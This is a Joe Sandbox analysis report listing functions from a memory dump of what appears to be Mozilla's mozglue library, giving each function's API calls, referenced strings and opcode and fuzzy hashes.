                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: floor$free$malloc$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3842999660-3916222277
                                                                                                      • Opcode ID: 12bf7db456867290cf583712ee8b4b37e83258e6dad93fc790acc2950406a537
                                                                                                      • Instruction ID: 923534ad5addaeb9413f490f090c52c5eed6e377c9a3eced307953e0d594dae9
                                                                                                      • Opcode Fuzzy Hash: 12bf7db456867290cf583712ee8b4b37e83258e6dad93fc790acc2950406a537
                                                                                                      • Instruction Fuzzy Hash: 0DF24A75908B808FC725CF28C18469AFBF5FFCA314F118A5ED99997721DB719882CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CFA64DF
                                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CFA64F2
                                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CFA6505
                                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CFA6518
                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CFA652B
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFA671C
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA6724
                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CFA672F
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA6759
                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CFA6764
                                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CFA6A80
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFA6ABE
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA6AD3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA6AE8
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA6AF7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                      • API String ID: 487479824-2878602165
                                                                                                      • Opcode ID: 93dc297927600c78c77ca1f816bbdabab2be97cac6d9a0009b51dd77f72b9f17
                                                                                                      • Instruction ID: c027dc9672c47b4527b5c27e09676e0f16513757ac7e8e2b15c945d884d74356
                                                                                                      • Opcode Fuzzy Hash: 93dc297927600c78c77ca1f816bbdabab2be97cac6d9a0009b51dd77f72b9f17
                                                                                                      • Instruction Fuzzy Hash: 63F1F471905219DFDB20CFA8CC48B9AF7B5AF0A318F144299E819E3681D731AE86CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01F688,00001000), ref: 6CF935D5
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CF935E0
                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6CF935FD
                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CF9363F
                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CF9369F
                                                                                                      • __aulldiv.LIBCMT ref: 6CF936E4
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6CF93773
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CF9377E
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CF937BD
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6CF937C4
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CF937CB
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CF93801
                                                                                                      • __aulldiv.LIBCMT ref: 6CF93883
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CF93902
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CF93918
                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CF9394C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                      • API String ID: 301339242-3790311718
                                                                                                      • Opcode ID: e7b4076d92fd01580599760bdb592aea0cb065e8e24936d9a7b49c6f95020195
                                                                                                      • Instruction ID: 1a155126dec493af969c1f56e5a1a0b876d8e84e469e350bfc6c9fc04cbab1be
                                                                                                      • Opcode Fuzzy Hash: e7b4076d92fd01580599760bdb592aea0cb065e8e24936d9a7b49c6f95020195
                                                                                                      • Instruction Fuzzy Hash: 9BB1A672A093109FEB08DFA9CC5671ABBF9FB8A704F05852DE4A9D3790D7709904CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFC5F9
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFC6FB
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CFFC74D
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CFFC7DE
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004014), ref: 6CFFC9D5
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFCC76
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFCD7A
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFDB40
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFDB62
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFDB99
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFDD8B
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFDE95
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFE360
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFE432
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFE472
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                      • Instruction ID: c155907c5c059ef7e3758b0ccaa6f8606a67b87b8e92e487b77ff9b75807020f
                                                                                                      • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                      • Instruction Fuzzy Hash: 4033B272E0021ACFCB14CF98C8806EDBBF2FF49314F194269D965AB765D731A946CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFAFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7B8), ref: 6CFAFF81
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7B8), ref: 6CFB022D
                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CFB0240
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E768), ref: 6CFB025B
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E768), ref: 6CFB027B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 618468079-3577267516
                                                                                                      • Opcode ID: 91c3c586a6d077d1018e6a96538706d1486f76c36193640a292f6e622ffdf8b3
                                                                                                      • Instruction ID: b248fca05765604c181aff6840c1648b3b46884fc0ad01744f0ca78416afcbff
                                                                                                      • Opcode Fuzzy Hash: 91c3c586a6d077d1018e6a96538706d1486f76c36193640a292f6e622ffdf8b3
                                                                                                      • Instruction Fuzzy Hash: F6C2B0B1A057418FD714CF29C980716BBE1BF8A328F28C66DE4A99B7D5D771E801CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,?,00004014), ref: 6CFFE811
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFEAA8
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFEBD5
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFEEF6
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFF223
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CFFF322
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6D000E03
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?), ref: 6D000E54
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6D000EAE
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6D000ED4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: e28bfade6fc23aa695243bf73cc04850a08e9e1b032b6b97dcbb85fef4b3669d
                                                                                                      • Instruction ID: 641888e2815521102ad40b4ffd9c79361a5eb5e18fc129c9829031f8554acacd
                                                                                                      • Opcode Fuzzy Hash: e28bfade6fc23aa695243bf73cc04850a08e9e1b032b6b97dcbb85fef4b3669d
                                                                                                      • Instruction Fuzzy Hash: 95638E71E0421A8FDB04CFA9C8906EDF7F2FF89310F298269D955AB355D730A946CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD3E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFF7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CFD3E7D,?,?,?,6CFD3E7D,?,?), ref: 6CFF777C
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CFD3F17
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CFD3F5C
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3F8D
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3F99
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3FA0
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFD3FA7
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CFD3FB4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                      • String ID: nvd3d9wrap.dll$nvinit.dll
                                                                                                      • API String ID: 1189858803-2380496106
                                                                                                      • Opcode ID: 2a51277c6be164a20fe4d74c5c9980bd17ae917df897ee7e56c44c1e7ebfeadd
                                                                                                      • Instruction ID: 5b3303ad407ab6d15964929c6f4d4190eab75af21a9bff3d1c518e09ebb27a73
                                                                                                      • Opcode Fuzzy Hash: 2a51277c6be164a20fe4d74c5c9980bd17ae917df897ee7e56c44c1e7ebfeadd
                                                                                                      • Instruction Fuzzy Hash: C152F471610B489FD715DF74C880AABB7E9AF85308F14492DE496CBB42DB34F90ACB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFBED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CFBEE7A
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CFBEFB5
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CFC1695
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFC16B4
                                                                                                      • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CFC1770
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CFC1A3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3693777188-0
                                                                                                      • Opcode ID: 683558595a2198c1ea666d9a1e9d76b543d4a920d80ae61a4521db8a8556fd86
                                                                                                      • Instruction ID: f812d6adfc94fd88b57c6dfb4fd1f6b19783d385f85aba1717959c2a23f42586
                                                                                                      • Opcode Fuzzy Hash: 683558595a2198c1ea666d9a1e9d76b543d4a920d80ae61a4521db8a8556fd86
                                                                                                      • Instruction Fuzzy Hash: ACB31875F0421A8FCB14CFA8C890ADEB7B2FF49304F2581A9D459AB745D730A986CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFAFEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7B8), ref: 6CFAFF81
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7B8), ref: 6CFB022D
                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CFB0240
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E768), ref: 6CFB025B
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E768), ref: 6CFB027B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 618468079-3566792288
                                                                                                      • Opcode ID: e108c2e73d7b4f48d0109fb62332de22444937c4cc67677df701a5697825fd86
                                                                                                      • Instruction ID: b0ac3f3c40a581f7edcd41c164cd6e80c75c2ab3366521e5e0cf71b1cc45ac41
                                                                                                      • Opcode Fuzzy Hash: e108c2e73d7b4f48d0109fb62332de22444937c4cc67677df701a5697825fd86
                                                                                                      • Instruction Fuzzy Hash: 94B29C716057418FD718CF2AC990716BBE1BF89328F28C66CE86A9FB95D770E841CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                      • API String ID: 0-2712937348
                                                                                                      • Opcode ID: 0b0495d8772a3987ecb23ee950b0745c3502277ce9c6283b7b124f9709237cd8
                                                                                                      • Instruction ID: 109c3dc378849e937912b94c2a4fe184278bf0a92f64aa86c330a85262e423eb
                                                                                                      • Opcode Fuzzy Hash: 0b0495d8772a3987ecb23ee950b0745c3502277ce9c6283b7b124f9709237cd8
                                                                                                      • Instruction Fuzzy Hash: 2C923B71A083459FD724CF28C490B9BBBE1BFC9308F14891DE59A9B751DB30E949CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CFE2ED3
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE2EE7
                                                                                                      • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CFE2F0D
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE3214
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFE3242
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFE36BF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                      • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                      • API String ID: 2257098003-3318126862
                                                                                                      • Opcode ID: d4c512530cdd78e190bfc796ffd0495eb59ff8d4aab11d11d4d64204aa3f736c
                                                                                                      • Instruction ID: b9d07d3cadd741111c5b311f36a2d423d9ad778fa640cbdddc0966bf1581bc04
                                                                                                      • Opcode Fuzzy Hash: d4c512530cdd78e190bfc796ffd0495eb59ff8d4aab11d11d4d64204aa3f736c
                                                                                                      • Instruction Fuzzy Hash: D4327075608381AFD324CF24C4846AFBBE2AFC9318F54881DE59987761DB31E94ACB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen
                                                                                                      • String ID: (pre-xul)$data$name$schema
                                                                                                      • API String ID: 3412268980-999448898
                                                                                                      • Opcode ID: 86ae1a52ca3c62c73db511e20e74738362386864434a8e27f0a8211362fa3cfa
                                                                                                      • Instruction ID: 73f80ad21b6026833888807e23e4a4c86bf5869097deb410349ea6f39dcb7f64
                                                                                                      • Opcode Fuzzy Hash: 86ae1a52ca3c62c73db511e20e74738362386864434a8e27f0a8211362fa3cfa
                                                                                                      • Instruction Fuzzy Hash: 93E17DB1A043419BD714CF68C84075BFBEABFD5314F154A2DE899A7780DBB0ED098B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFBD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD4F2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD50B
                                                                                                        • Part of subcall function 6CF9CFE0: EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF9CFF6
                                                                                                        • Part of subcall function 6CF9CFE0: LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF9D026
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD52E
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD690
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBD6A6
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD712
